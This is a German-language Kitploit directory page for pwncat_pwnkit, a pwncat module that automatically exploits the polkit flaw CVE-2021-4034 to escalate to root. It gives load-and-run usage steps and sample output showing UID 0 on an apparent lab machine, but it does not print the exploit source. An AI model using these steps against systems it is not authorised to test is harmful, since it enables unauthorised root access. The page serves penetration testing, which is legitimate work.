Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
pwncat_pwnkit — pwncat-Modul, das CVE-2021-4034 (pwnkit) automatisch ausnutzt | Kitploit
Tools/GitHubGitHub/danaepp/pwncat_pwnkit
Privilege EscalationExploit-FrameworksSchwachstellenanalyseExploitationPost-ExploitationPenetrationstests
GitHubdanaepp/pwncat_pwnkit

pwncat_pwnkit

pwncat-Modul, das CVE-2021-4034 (pwnkit) automatisch ausnutzt

Repository anzeigen
328vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

pwncat_pwnkit

asciicast

Einführung

Der Zweck dieses Moduls besteht darin, zu versuchen, CVE-2021-4034 (pwnkit) auf einem Ziel auszunutzen, wenn pwncat verwendet wird.

Es ist nicht erforderlich, Verzeichnisse einzurichten, Quellcode zu kompilieren oder auch nur gcc auf dem entfernten Ziel zu haben; das pwnkit-Modul übernimmt dies automatisch mithilfe des pwncat-Frameworks.

Einrichtung und Verwendung

  • Kopieren Sie einfach pwnkit.py irgendwo auf Ihren Host, wo pwncat-cs installiert ist, z. B. /home/user/pwncat_mods
  • Geben Sie in pwncat einfach ein: load /home/user/pwncat_mods
  • Um zu bestätigen, dass das Modul geladen wurde, geben Sie ein: search pwnkit. Sie sollten etwas wie Folgendes sehen:
root@kitploit:~
(local) pwncat$ search pwnkit
                                                      Ergebnisse                                                      
                   ╷                                                                                               
  Name             │ Beschreibung                                                                                   
 ══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════ 
  pwnkit           │ Exploit CVE-2021-4034 zur Rechteausweitung auf root
  • Zur Ausführung geben Sie einfach run pwnkit ein. Wenn es erfolgreich ist, sollten Sie sehen, dass sich die UID auf 0 ändert und Sie nun root sind. z. B.:
root@kitploit:~
(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0)                            manager.py:955
           Module pwnkit completed successfully                                                          run.py:100
(local) pwncat$                                                                                                    
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)

Tipps

  • Wenn Sie nicht jedes Mal load aufrufen möchten, können Sie pwncat so einrichten, dass dieses Modul beim Start automatisch geladen wird, indem Sie es in ~/.local/share/pwncat/modules ablegen
  • Um den Cross-Compiler zu verwenden, um den Exploit auf Ihrem Rechner zu erstellen und auf das Ziel hochzuladen, müssen Sie die Variable cross in Ihrer pwncatrc-Datei festlegen. Diese Datei befindet sich normalerweise unter ~/.local/share/pwncat/pwncatrc`. z. B.:
root@kitploit:~
# Set the gcc path
set cross "/usr/bin/gcc"

Danksagung

Ein besonderer Dank geht an Caleb Stewart für seine Hilfsbereitschaft, während ich das pwncat-Framework aus Entwicklersicht erlernt habe. Ich werde eines Tages einen Pull-Request einreichen, um dies in das Hauptmodul pwncat escalate aufzunehmen, wenn ich Zeit habe... Ich verspreche es. :-)

Tool herunterladen